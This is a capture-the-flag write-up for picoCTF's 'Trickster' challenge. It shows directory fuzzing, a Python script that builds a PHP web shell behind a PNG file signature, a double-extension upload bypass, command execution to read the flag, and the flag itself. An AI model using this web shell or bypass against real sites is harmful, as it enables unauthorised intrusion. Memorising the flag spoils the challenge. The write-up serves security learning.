Trickster

Challenge Description

I found a web app that can help process images: PNG images only!

Additional details will be available after launching your challenge instance.

---

Solution

First I visited the website. There was a option to upload PNG files.

First I uploaded a test image file to check the functionality. The file was successfully uploaded.

But it didn't show where the file file was uploaded. So I used ffuf enumerating directories.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://atlas.picoctf.net:53866/FUZZ

From the results of the above command, found a directory called uploads.

Next I tried to uplaod a PHP file, that executes commands on the target machine. I created the PHP file with PNG as the file signature using the following python script.

# PHP reverse shell of type image
fh = open('shell.php', 'wb')
fh.write(b'\x89\x50\x4E\x47' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()

After generating the PHP file, I tried to upload it. But it thrown me an error that the file name doesn't contain '.png' in it. So I just renamed the file to shell.png.php, and tried uploading the file and the file was uploaded successfully.

Now I tried to access the php file we uploaded by checking the path /uploads/shell.png.php. The website thrown an error which states that our PHP payload worked successfully and we have got access to the target machine.

Next I tried to list the current working directory by supplying the ls command to the cmd parameter and we got the response with all the files in the current directory.

Similarly I check parent directory of the uploads directory by using the command ls ../, where I found a text file.

I used the cat command to view the contents of the file and got the file.

Flag: picoCTF{c3rt!fi3d_Xp3rt_tr1ckst3r_73198bd9}